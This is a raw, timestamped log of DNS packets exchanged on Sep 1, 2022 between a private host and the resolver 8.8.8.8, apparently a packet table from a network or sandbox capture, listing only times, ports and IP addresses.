                                    Sep 1, 2022 00:02:32.423641920 CEST4916853192.168.2.38.8.8.8
                                    Sep 1, 2022 00:02:32.442924023 CEST53491688.8.8.8192.168.2.3
                                    Sep 1, 2022 00:02:32.443413973 CEST4916953192.168.2.38.8.8.8
                                    Sep 1, 2022 00:02:32.465111017 CEST53491698.8.8.8192.168.2.3
                                    Sep 1, 2022 00:02:32.467434883 CEST4917053192.168.2.38.8.8.8
                                    Sep 1, 2022 00:02:32.486720085 CEST53491708.8.8.8192.168.2.3
                                    Sep 1, 2022 00:02:32.489443064 CEST4917153192.168.2.38.8.8.8
                                    Sep 1, 2022 00:02:32.510637999 CEST53491718.8.8.8192.168.2.3
                                    Sep 1, 2022 00:02:32.867223024 CEST5830153192.168.2.38.8.8.8
                                    Sep 1, 2022 00:02:33.862488031 CEST5830153192.168.2.38.8.8.8
                                    Sep 1, 2022 00:02:33.985611916 CEST53491668.8.8.8192.168.2.3
                                    Sep 1, 2022 00:02:34.407073975 CEST53583018.8.8.8192.168.2.3
                                    Sep 1, 2022 00:02:34.417866945 CEST5830253192.168.2.38.8.8.8
                                    Sep 1, 2022 00:02:34.435112000 CEST53583028.8.8.8192.168.2.3
                                    Sep 1, 2022 00:02:34.435885906 CEST5830353192.168.2.38.8.8.8
                                    Sep 1, 2022 00:02:34.459167957 CEST53583038.8.8.8192.168.2.3
                                    Sep 1, 2022 00:02:34.463043928 CEST5830453192.168.2.38.8.8.8
                                    Sep 1, 2022 00:02:34.484791994 CEST53583048.8.8.8192.168.2.3
                                    Sep 1, 2022 00:02:34.489913940 CEST53583018.8.8.8192.168.2.3
                                    Sep 1, 2022 00:02:34.497220993 CEST5830553192.168.2.38.8.8.8
                                    Sep 1, 2022 00:02:34.517954111 CEST53583058.8.8.8192.168.2.3
                                    Sep 1, 2022 00:02:34.518929958 CEST5830653192.168.2.38.8.8.8
                                    Sep 1, 2022 00:02:34.537820101 CEST53583068.8.8.8192.168.2.3
                                    Sep 1, 2022 00:02:34.851964951 CEST6344653192.168.2.38.8.8.8
                                    Sep 1, 2022 00:02:35.427285910 CEST53634468.8.8.8192.168.2.3
                                    Sep 1, 2022 00:02:35.437273979 CEST6344753192.168.2.38.8.8.8
                                    Sep 1, 2022 00:02:35.454541922 CEST53634478.8.8.8192.168.2.3
                                    Sep 1, 2022 00:02:35.455212116 CEST6344853192.168.2.38.8.8.8
                                    Sep 1, 2022 00:02:35.475027084 CEST53634488.8.8.8192.168.2.3
                                    Sep 1, 2022 00:02:35.476502895 CEST6344953192.168.2.38.8.8.8
                                    Sep 1, 2022 00:02:35.496222973 CEST53634498.8.8.8192.168.2.3
                                    Sep 1, 2022 00:02:35.496675014 CEST6345053192.168.2.38.8.8.8
                                    Sep 1, 2022 00:02:35.516345024 CEST53634508.8.8.8192.168.2.3
                                    Sep 1, 2022 00:02:35.516824961 CEST6345153192.168.2.38.8.8.8
                                    Sep 1, 2022 00:02:35.536685944 CEST53634518.8.8.8192.168.2.3
                                    Sep 1, 2022 00:02:35.859457016 CEST4987453192.168.2.38.8.8.8
                                    Sep 1, 2022 00:02:35.984587908 CEST53498748.8.8.8192.168.2.3
                                    Sep 1, 2022 00:02:35.995635033 CEST4987553192.168.2.38.8.8.8
                                    Sep 1, 2022 00:02:36.012811899 CEST53498758.8.8.8192.168.2.3
                                    Sep 1, 2022 00:02:36.017096996 CEST4987653192.168.2.38.8.8.8
                                    Sep 1, 2022 00:02:36.034972906 CEST53498768.8.8.8192.168.2.3
                                    Sep 1, 2022 00:02:36.035378933 CEST4987753192.168.2.38.8.8.8
                                    Sep 1, 2022 00:02:36.053332090 CEST53498778.8.8.8192.168.2.3
                                    Sep 1, 2022 00:02:36.053729057 CEST4987853192.168.2.38.8.8.8
                                    Sep 1, 2022 00:02:36.071810961 CEST53498788.8.8.8192.168.2.3
                                    Sep 1, 2022 00:02:36.072251081 CEST4987953192.168.2.38.8.8.8
                                    Sep 1, 2022 00:02:36.091907978 CEST53498798.8.8.8192.168.2.3
                                    Sep 1, 2022 00:02:36.459953070 CEST6545953192.168.2.38.8.8.8
                                    Sep 1, 2022 00:02:37.472609997 CEST6545953192.168.2.38.8.8.8
                                    Sep 1, 2022 00:02:38.497634888 CEST6545953192.168.2.38.8.8.8
                                    Sep 1, 2022 00:02:38.631139994 CEST53654598.8.8.8192.168.2.3
                                    Sep 1, 2022 00:02:38.640486956 CEST6538653192.168.2.38.8.8.8
                                    Sep 1, 2022 00:02:38.659338951 CEST53653868.8.8.8192.168.2.3
                                    Sep 1, 2022 00:02:38.660218000 CEST6538753192.168.2.38.8.8.8
                                    Sep 1, 2022 00:02:38.680645943 CEST53653878.8.8.8192.168.2.3
                                    Sep 1, 2022 00:02:38.683294058 CEST6538853192.168.2.38.8.8.8
                                    Sep 1, 2022 00:02:38.701905012 CEST53653888.8.8.8192.168.2.3
                                    Sep 1, 2022 00:02:38.719558001 CEST6538953192.168.2.38.8.8.8
                                    Sep 1, 2022 00:02:38.738066912 CEST53653898.8.8.8192.168.2.3
                                    Sep 1, 2022 00:02:38.738598108 CEST6539053192.168.2.38.8.8.8
                                    Sep 1, 2022 00:02:38.759218931 CEST53653908.8.8.8192.168.2.3
                                    Sep 1, 2022 00:02:39.027879000 CEST53654598.8.8.8192.168.2.3
                                    Sep 1, 2022 00:02:39.088742971 CEST5415353192.168.2.38.8.8.8
                                    Sep 1, 2022 00:02:39.143616915 CEST53654598.8.8.8192.168.2.3
                                    Sep 1, 2022 00:02:39.675185919 CEST53541538.8.8.8192.168.2.3
                                    Sep 1, 2022 00:02:39.691652060 CEST5415453192.168.2.38.8.8.8
                                    Sep 1, 2022 00:02:39.710722923 CEST53541548.8.8.8192.168.2.3
                                    Sep 1, 2022 00:02:39.711365938 CEST5415553192.168.2.38.8.8.8
                                    Sep 1, 2022 00:02:39.729000092 CEST53541558.8.8.8192.168.2.3
                                    Sep 1, 2022 00:02:39.730597973 CEST5415653192.168.2.38.8.8.8
                                    Sep 1, 2022 00:02:39.750302076 CEST53541568.8.8.8192.168.2.3
                                    Sep 1, 2022 00:02:39.751533031 CEST5415753192.168.2.38.8.8.8
                                    Sep 1, 2022 00:02:39.771075010 CEST53541578.8.8.8192.168.2.3
                                    Sep 1, 2022 00:02:39.772185087 CEST5415853192.168.2.38.8.8.8
                                    Sep 1, 2022 00:02:39.791596889 CEST53541588.8.8.8192.168.2.3
                                    Sep 1, 2022 00:02:40.153419018 CEST6460253192.168.2.38.8.8.8
                                    Sep 1, 2022 00:02:41.172076941 CEST6460253192.168.2.38.8.8.8
                                    Sep 1, 2022 00:02:41.822036982 CEST53646028.8.8.8192.168.2.3
                                    Sep 1, 2022 00:02:41.842334986 CEST6460353192.168.2.38.8.8.8
                                    Sep 1, 2022 00:02:41.861427069 CEST53646038.8.8.8192.168.2.3
                                    Sep 1, 2022 00:02:41.862104893 CEST6460453192.168.2.38.8.8.8
                                    Sep 1, 2022 00:02:41.881999969 CEST53646048.8.8.8192.168.2.3
                                    Sep 1, 2022 00:02:41.882664919 CEST6460553192.168.2.38.8.8.8
                                    Sep 1, 2022 00:02:41.902828932 CEST53646058.8.8.8192.168.2.3
                                    Sep 1, 2022 00:02:41.903320074 CEST6460653192.168.2.38.8.8.8
                                    Sep 1, 2022 00:02:41.921314955 CEST53646068.8.8.8192.168.2.3
                                    Sep 1, 2022 00:02:41.921899080 CEST6460753192.168.2.38.8.8.8
                                    Sep 1, 2022 00:02:41.941456079 CEST53646078.8.8.8192.168.2.3
                                    Sep 1, 2022 00:02:42.277318001 CEST5078453192.168.2.38.8.8.8
                                    Sep 1, 2022 00:02:42.283397913 CEST53646028.8.8.8192.168.2.3
                                    Sep 1, 2022 00:02:43.285449982 CEST5078453192.168.2.38.8.8.8
                                    Sep 1, 2022 00:02:43.320070028 CEST53507848.8.8.8192.168.2.3
                                    Sep 1, 2022 00:02:43.328716993 CEST5078553192.168.2.38.8.8.8
                                    Sep 1, 2022 00:02:43.345973015 CEST53507858.8.8.8192.168.2.3
                                    Sep 1, 2022 00:02:43.346779108 CEST5078653192.168.2.38.8.8.8
                                    Sep 1, 2022 00:02:43.366689920 CEST53507868.8.8.8192.168.2.3
                                    Sep 1, 2022 00:02:43.367193937 CEST5078753192.168.2.38.8.8.8
                                    Sep 1, 2022 00:02:43.386923075 CEST53507878.8.8.8192.168.2.3
                                    Sep 1, 2022 00:02:43.387386084 CEST5078853192.168.2.38.8.8.8
                                    Sep 1, 2022 00:02:43.405071020 CEST53507888.8.8.8192.168.2.3
                                    Sep 1, 2022 00:02:43.405654907 CEST5078953192.168.2.38.8.8.8
                                    Sep 1, 2022 00:02:43.425419092 CEST53507898.8.8.8192.168.2.3
                                    Sep 1, 2022 00:02:43.751919985 CEST6412153192.168.2.38.8.8.8
                                    Sep 1, 2022 00:02:44.279233932 CEST53641218.8.8.8192.168.2.3
                                    Sep 1, 2022 00:02:44.286156893 CEST6412253192.168.2.38.8.8.8
                                    Sep 1, 2022 00:02:44.305149078 CEST53641228.8.8.8192.168.2.3
                                    Sep 1, 2022 00:02:44.306859970 CEST6412353192.168.2.38.8.8.8
                                    Sep 1, 2022 00:02:44.326653957 CEST53641238.8.8.8192.168.2.3
                                    Sep 1, 2022 00:02:44.327136040 CEST6412453192.168.2.38.8.8.8
                                    Sep 1, 2022 00:02:44.346456051 CEST53641248.8.8.8192.168.2.3
                                    Sep 1, 2022 00:02:44.347197056 CEST6412553192.168.2.38.8.8.8
                                    Sep 1, 2022 00:02:44.366677999 CEST53641258.8.8.8192.168.2.3
                                    Sep 1, 2022 00:02:44.367091894 CEST6412653192.168.2.38.8.8.8
                                    Sep 1, 2022 00:02:44.386941910 CEST53641268.8.8.8192.168.2.3
                                    Sep 1, 2022 00:02:44.774935961 CEST6496753192.168.2.38.8.8.8
                                    Sep 1, 2022 00:02:44.819075108 CEST53649678.8.8.8192.168.2.3
                                    Sep 1, 2022 00:02:44.827179909 CEST6496853192.168.2.38.8.8.8
                                    Sep 1, 2022 00:02:44.846179008 CEST53649688.8.8.8192.168.2.3
                                    Sep 1, 2022 00:02:44.846894979 CEST6496953192.168.2.38.8.8.8
                                    Sep 1, 2022 00:02:44.864609003 CEST53649698.8.8.8192.168.2.3
                                    Sep 1, 2022 00:02:44.867082119 CEST6497053192.168.2.38.8.8.8
                                    Sep 1, 2022 00:02:44.886693001 CEST53649708.8.8.8192.168.2.3
                                    Sep 1, 2022 00:02:44.887150049 CEST6497153192.168.2.38.8.8.8
                                    Sep 1, 2022 00:02:44.908752918 CEST53649718.8.8.8192.168.2.3
                                    Sep 1, 2022 00:02:44.909322977 CEST6497253192.168.2.38.8.8.8
                                    Sep 1, 2022 00:02:44.929284096 CEST53649728.8.8.8192.168.2.3
                                    Sep 1, 2022 00:02:45.564925909 CEST6082553192.168.2.38.8.8.8
                                    Sep 1, 2022 00:02:46.551074982 CEST6082553192.168.2.38.8.8.8
                                    Sep 1, 2022 00:02:46.625612020 CEST53608258.8.8.8192.168.2.3
                                    Sep 1, 2022 00:02:46.632401943 CEST4920253192.168.2.38.8.8.8
                                    Sep 1, 2022 00:02:46.652822018 CEST53492028.8.8.8192.168.2.3
                                    Sep 1, 2022 00:02:46.656883001 CEST4920353192.168.2.38.8.8.8
                                    Sep 1, 2022 00:02:46.677609921 CEST53492038.8.8.8192.168.2.3
                                    Sep 1, 2022 00:02:46.678054094 CEST4920453192.168.2.38.8.8.8
                                    Sep 1, 2022 00:02:46.696248055 CEST53492048.8.8.8192.168.2.3
                                    Sep 1, 2022 00:02:46.696702003 CEST4920553192.168.2.38.8.8.8
                                    Sep 1, 2022 00:02:46.716310978 CEST53492058.8.8.8192.168.2.3
                                    Sep 1, 2022 00:02:46.717207909 CEST4920653192.168.2.38.8.8.8
                                    Sep 1, 2022 00:02:46.736613989 CEST53492068.8.8.8192.168.2.3
                                    Sep 1, 2022 00:02:47.066291094 CEST6493653192.168.2.38.8.8.8
                                    Sep 1, 2022 00:02:47.092792034 CEST53649368.8.8.8192.168.2.3
                                    Sep 1, 2022 00:02:47.096024036 CEST53608258.8.8.8192.168.2.3
                                    Sep 1, 2022 00:02:47.102243900 CEST6493753192.168.2.38.8.8.8
                                    Sep 1, 2022 00:02:47.119285107 CEST53649378.8.8.8192.168.2.3
                                    Sep 1, 2022 00:02:47.119975090 CEST6047453192.168.2.38.8.8.8
                                    Sep 1, 2022 00:02:47.137702942 CEST53604748.8.8.8192.168.2.3
                                    Sep 1, 2022 00:02:47.139273882 CEST6047553192.168.2.38.8.8.8
                                    Sep 1, 2022 00:02:47.159663916 CEST53604758.8.8.8192.168.2.3
                                    Sep 1, 2022 00:02:47.160135031 CEST6047653192.168.2.38.8.8.8
                                    Sep 1, 2022 00:02:47.179497957 CEST53604768.8.8.8192.168.2.3
                                    Sep 1, 2022 00:02:47.180254936 CEST6047753192.168.2.38.8.8.8
                                    Sep 1, 2022 00:02:47.199672937 CEST53604778.8.8.8192.168.2.3
                                    Sep 1, 2022 00:02:47.295221090 CEST53507848.8.8.8192.168.2.3
                                    Sep 1, 2022 00:02:48.143838882 CEST5937453192.168.2.38.8.8.8
                                    Sep 1, 2022 00:02:48.169800997 CEST53593748.8.8.8192.168.2.3
                                    Sep 1, 2022 00:02:48.243660927 CEST5937553192.168.2.38.8.8.8
                                    Sep 1, 2022 00:02:48.262660027 CEST53593758.8.8.8192.168.2.3
                                    Sep 1, 2022 00:02:48.263272047 CEST5937653192.168.2.38.8.8.8
                                    Sep 1, 2022 00:02:48.282622099 CEST53593768.8.8.8192.168.2.3
                                    Sep 1, 2022 00:02:48.283085108 CEST5937753192.168.2.38.8.8.8
                                    Sep 1, 2022 00:02:48.302493095 CEST53593778.8.8.8192.168.2.3
                                    Sep 1, 2022 00:02:48.340517998 CEST5937853192.168.2.38.8.8.8
                                    Sep 1, 2022 00:02:48.359857082 CEST53593788.8.8.8192.168.2.3
                                    Sep 1, 2022 00:02:48.360270023 CEST5937953192.168.2.38.8.8.8
                                    Sep 1, 2022 00:02:48.378109932 CEST53593798.8.8.8192.168.2.3
                                    Sep 1, 2022 00:02:48.992279053 CEST5661653192.168.2.38.8.8.8
                                    Sep 1, 2022 00:02:49.030847073 CEST53566168.8.8.8192.168.2.3
                                    Sep 1, 2022 00:02:49.039655924 CEST5661753192.168.2.38.8.8.8
                                    Sep 1, 2022 00:02:49.060447931 CEST53566178.8.8.8192.168.2.3
                                    Sep 1, 2022 00:02:49.105935097 CEST5661853192.168.2.38.8.8.8
                                    Sep 1, 2022 00:02:49.125612974 CEST53566188.8.8.8192.168.2.3
                                    Sep 1, 2022 00:02:49.126044989 CEST5661953192.168.2.38.8.8.8
                                    Sep 1, 2022 00:02:49.145709991 CEST53566198.8.8.8192.168.2.3
                                    Sep 1, 2022 00:02:49.146584034 CEST5662053192.168.2.38.8.8.8
                                    Sep 1, 2022 00:02:49.164716959 CEST53566208.8.8.8192.168.2.3
                                    Sep 1, 2022 00:02:49.211679935 CEST5662153192.168.2.38.8.8.8
                                    Sep 1, 2022 00:02:49.230854988 CEST53566218.8.8.8192.168.2.3
                                    Sep 1, 2022 00:02:50.544686079 CEST6118453192.168.2.38.8.8.8
                                    Sep 1, 2022 00:02:51.666511059 CEST53611848.8.8.8192.168.2.3
                                    Sep 1, 2022 00:02:52.608259916 CEST6118453192.168.2.38.8.8.8
                                    Sep 1, 2022 00:02:52.628920078 CEST6118553192.168.2.38.8.8.8
                                    Sep 1, 2022 00:02:52.647394896 CEST53611858.8.8.8192.168.2.3
                                    Sep 1, 2022 00:02:52.648139954 CEST6118653192.168.2.38.8.8.8
                                    Sep 1, 2022 00:02:52.669127941 CEST53611868.8.8.8192.168.2.3
                                    Sep 1, 2022 00:02:52.669550896 CEST6118753192.168.2.38.8.8.8
                                    Sep 1, 2022 00:02:52.691092014 CEST53611878.8.8.8192.168.2.3
                                    Sep 1, 2022 00:02:52.691628933 CEST6118853192.168.2.38.8.8.8
                                    Sep 1, 2022 00:02:52.712511063 CEST53611888.8.8.8192.168.2.3
                                    Sep 1, 2022 00:02:52.764321089 CEST6118953192.168.2.38.8.8.8
                                    Sep 1, 2022 00:02:52.786346912 CEST53611898.8.8.8192.168.2.3
                                    Sep 1, 2022 00:02:53.163081884 CEST5738753192.168.2.38.8.8.8
                                    Sep 1, 2022 00:02:53.169249058 CEST53611848.8.8.8192.168.2.3
                                    Sep 1, 2022 00:02:53.199151039 CEST53573878.8.8.8192.168.2.3
                                    Sep 1, 2022 00:02:53.207458973 CEST5738853192.168.2.38.8.8.8
                                    Sep 1, 2022 00:02:53.227545977 CEST53573888.8.8.8192.168.2.3
                                    Sep 1, 2022 00:02:53.228133917 CEST5738953192.168.2.38.8.8.8
                                    Sep 1, 2022 00:02:53.250277996 CEST53573898.8.8.8192.168.2.3
                                    Sep 1, 2022 00:02:53.250638962 CEST5739053192.168.2.38.8.8.8
                                    Sep 1, 2022 00:02:53.274090052 CEST53573908.8.8.8192.168.2.3
                                    Sep 1, 2022 00:02:53.276937962 CEST5739153192.168.2.38.8.8.8
                                    Sep 1, 2022 00:02:53.296488047 CEST53573918.8.8.8192.168.2.3
                                    Sep 1, 2022 00:02:53.296910048 CEST5739253192.168.2.38.8.8.8
                                    Sep 1, 2022 00:02:53.315620899 CEST53573928.8.8.8192.168.2.3
                                    Sep 1, 2022 00:02:53.660832882 CEST5022853192.168.2.38.8.8.8
                                    Sep 1, 2022 00:02:54.678829908 CEST5022853192.168.2.38.8.8.8
                                    Sep 1, 2022 00:02:54.707915068 CEST53502288.8.8.8192.168.2.3
                                    Sep 1, 2022 00:02:54.715509892 CEST5022953192.168.2.38.8.8.8
                                    Sep 1, 2022 00:02:54.727380991 CEST53502288.8.8.8192.168.2.3
                                    Sep 1, 2022 00:02:54.735213995 CEST53502298.8.8.8192.168.2.3
                                    Sep 1, 2022 00:02:54.735838890 CEST5023053192.168.2.38.8.8.8
                                    Sep 1, 2022 00:02:54.755316019 CEST53502308.8.8.8192.168.2.3
                                    Sep 1, 2022 00:02:54.755738974 CEST5023153192.168.2.38.8.8.8
                                    Sep 1, 2022 00:02:54.777358055 CEST53502318.8.8.8192.168.2.3
                                    Sep 1, 2022 00:02:54.777870893 CEST5023253192.168.2.38.8.8.8
                                    Sep 1, 2022 00:02:54.797842026 CEST53502328.8.8.8192.168.2.3
                                    Sep 1, 2022 00:02:54.805593014 CEST5023353192.168.2.38.8.8.8
                                    Sep 1, 2022 00:02:54.826921940 CEST53502338.8.8.8192.168.2.3
                                    Sep 1, 2022 00:02:55.193733931 CEST5326953192.168.2.38.8.8.8
                                    Sep 1, 2022 00:02:55.222019911 CEST53532698.8.8.8192.168.2.3
                                    Sep 1, 2022 00:02:55.231367111 CEST5327053192.168.2.38.8.8.8
                                    Sep 1, 2022 00:02:55.248954058 CEST53532708.8.8.8192.168.2.3
                                    Sep 1, 2022 00:02:55.260307074 CEST5327153192.168.2.38.8.8.8
                                    Sep 1, 2022 00:02:55.282449961 CEST53532718.8.8.8192.168.2.3
                                    Sep 1, 2022 00:02:55.282820940 CEST5327253192.168.2.38.8.8.8
                                    Sep 1, 2022 00:02:55.303663969 CEST53532728.8.8.8192.168.2.3
                                    Sep 1, 2022 00:02:55.304130077 CEST5327353192.168.2.38.8.8.8
                                    Sep 1, 2022 00:02:55.325366020 CEST53532738.8.8.8192.168.2.3
                                    Sep 1, 2022 00:02:55.325848103 CEST5327453192.168.2.38.8.8.8
                                    Sep 1, 2022 00:02:55.344696999 CEST53532748.8.8.8192.168.2.3
                                    Sep 1, 2022 00:02:55.844996929 CEST5982753192.168.2.38.8.8.8
                                    Sep 1, 2022 00:02:55.919511080 CEST53598278.8.8.8192.168.2.3
                                    Sep 1, 2022 00:02:55.932115078 CEST5982853192.168.2.38.8.8.8
                                    Sep 1, 2022 00:02:55.952475071 CEST53598288.8.8.8192.168.2.3
                                    Sep 1, 2022 00:02:55.953111887 CEST5982953192.168.2.38.8.8.8
                                    Sep 1, 2022 00:02:55.974069118 CEST53598298.8.8.8192.168.2.3
                                    Sep 1, 2022 00:02:55.974494934 CEST5983053192.168.2.38.8.8.8
                                    Sep 1, 2022 00:02:55.995476007 CEST53598308.8.8.8192.168.2.3
                                    Sep 1, 2022 00:02:55.995863914 CEST5983153192.168.2.38.8.8.8
                                    Sep 1, 2022 00:02:56.016655922 CEST53598318.8.8.8192.168.2.3
                                    Sep 1, 2022 00:02:56.017085075 CEST5983253192.168.2.38.8.8.8
                                    Sep 1, 2022 00:02:56.038196087 CEST53598328.8.8.8192.168.2.3
                                    Sep 1, 2022 00:02:56.404357910 CEST6243153192.168.2.38.8.8.8
                                    Sep 1, 2022 00:02:57.411904097 CEST6243153192.168.2.38.8.8.8
                                    Sep 1, 2022 00:02:57.439387083 CEST53624318.8.8.8192.168.2.3
                                    Sep 1, 2022 00:02:57.447629929 CEST6243253192.168.2.38.8.8.8
                                    Sep 1, 2022 00:02:57.449079037 CEST53624318.8.8.8192.168.2.3
                                    Sep 1, 2022 00:02:57.467147112 CEST53624328.8.8.8192.168.2.3
                                    Sep 1, 2022 00:02:57.467935085 CEST6243353192.168.2.38.8.8.8
                                    Sep 1, 2022 00:02:57.488708973 CEST53624338.8.8.8192.168.2.3
                                    Sep 1, 2022 00:02:57.492444992 CEST6243453192.168.2.38.8.8.8
                                    Sep 1, 2022 00:02:57.511897087 CEST53624348.8.8.8192.168.2.3
                                    Sep 1, 2022 00:02:57.512286901 CEST6243553192.168.2.38.8.8.8
                                    Sep 1, 2022 00:02:57.530978918 CEST53624358.8.8.8192.168.2.3
                                    Sep 1, 2022 00:02:57.542714119 CEST6243653192.168.2.38.8.8.8
                                    Sep 1, 2022 00:02:57.561358929 CEST53624368.8.8.8192.168.2.3
                                    Sep 1, 2022 00:02:57.924940109 CEST6427153192.168.2.38.8.8.8
                                    Sep 1, 2022 00:02:58.928544044 CEST6427153192.168.2.38.8.8.8
                                    Sep 1, 2022 00:02:59.943011045 CEST6427153192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:00.010236025 CEST53642718.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:00.017366886 CEST6427253192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:00.035882950 CEST53642728.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:00.036817074 CEST6427353192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:00.057038069 CEST53642738.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:00.057399988 CEST6427453192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:00.076392889 CEST53642748.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:00.076893091 CEST6427553192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:00.097615957 CEST53642758.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:00.100399017 CEST6427653192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:00.121129990 CEST53642768.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:00.563648939 CEST5110553192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:01.554763079 CEST5110553192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:01.584554911 CEST53511058.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:01.595273972 CEST53511058.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:01.601682901 CEST5110653192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:01.622442007 CEST53511068.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:01.623106956 CEST5110753192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:01.644107103 CEST53511078.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:01.644612074 CEST5110853192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:01.665334940 CEST53511088.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:01.665771961 CEST5110953192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:01.686562061 CEST53511098.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:01.687030077 CEST5111053192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:01.706001043 CEST53511108.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:02.153387070 CEST5245553192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:02.779787064 CEST53524558.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:02.801975012 CEST5245653192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:02.821990013 CEST53524568.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:02.822494030 CEST5245753192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:02.843368053 CEST53524578.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:02.844405890 CEST5245853192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:02.865358114 CEST53524588.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:02.900983095 CEST5245953192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:02.922287941 CEST53524598.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:02.922605991 CEST5246053192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:02.942126989 CEST53524608.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:02.945770025 CEST53642718.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:03.343214035 CEST5524453192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:03.418770075 CEST53552448.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:03.427838087 CEST5524553192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:03.446106911 CEST53552458.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:03.448040962 CEST5524653192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:03.465781927 CEST53552468.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:03.466197014 CEST5524753192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:03.485872984 CEST53552478.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:03.486265898 CEST5524853192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:03.505850077 CEST53552488.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:03.506251097 CEST5524953192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:03.524724007 CEST53552498.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:03.962084055 CEST6496953192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:03.967163086 CEST53642718.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:04.974921942 CEST6496953192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:05.580583096 CEST53649698.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:05.594440937 CEST6497053192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:05.616434097 CEST53649708.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:05.617213011 CEST6497153192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:05.638950109 CEST53649718.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:05.639385939 CEST6497253192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:05.661201954 CEST53649728.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:05.661525011 CEST6497353192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:05.683096886 CEST53649738.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:05.683602095 CEST6497453192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:05.704983950 CEST53649748.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:06.090673923 CEST53649698.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:06.123651028 CEST5303753192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:06.253566980 CEST53530378.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:06.260365963 CEST5303853192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:06.279741049 CEST53530388.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:06.280270100 CEST5303953192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:06.300148010 CEST53530398.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:06.300781012 CEST5304053192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:06.318766117 CEST53530408.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:06.319112062 CEST5304153192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:06.339133978 CEST53530418.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:06.339869022 CEST5304253192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:06.360065937 CEST53530428.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:06.701911926 CEST5545753192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:07.230133057 CEST53554578.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:07.240674019 CEST5545853192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:07.261197090 CEST53554588.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:07.276021957 CEST5545953192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:07.297318935 CEST53554598.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:07.301197052 CEST5546053192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:07.321963072 CEST53554608.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:07.325311899 CEST5546153192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:07.345874071 CEST53554618.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:07.346616983 CEST5546253192.168.2.38.8.8.8
                                    Sep 1, 2022 00:03:07.367491961 CEST53554628.8.8.8192.168.2.3
                                    Sep 1, 2022 00:03:08.098186970 CEST6081653192.168.2.38.8.8.8
